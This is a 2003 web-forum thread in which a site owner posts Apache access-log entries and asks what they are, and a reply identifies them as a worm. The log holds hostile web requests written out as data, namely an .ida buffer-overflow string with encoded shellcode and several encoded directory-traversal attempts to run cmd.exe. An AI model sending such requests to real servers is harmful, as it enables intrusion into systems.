#1
  1. No Profile Picture
    Senior Member
    Devshed Newbie (0 - 499 posts)

    Join Date
    Sep 2002
    Location
    Boston MA
    Posts
    100
    Rep Power
    0

    Virus, Hacker or what?


    I keep getting this showing up in my access log. I am guessing it is some kind of script probing my machine for vulnerabilities?

    Anyone know for sure?
    Code:
    68.83.51.194 - - [10/Sep/2003:11:11:10 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 1072 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:15 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:16 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:18 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:20 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:22 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:24 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
    HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:26 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
    404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:28 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
    /winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:30 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:32 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:34 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:36 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:38 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 990 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:39 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 990 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:41 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:43 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
  2. #2
  3. No Profile Picture
    Contributing User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Jan 2003
    Posts
    34
    Rep Power
    12
    yes, it is indeed a worm, but i believe apache is safe & so are patched IIS

IMN logo majestic logo threadwatch logo seochat tools logo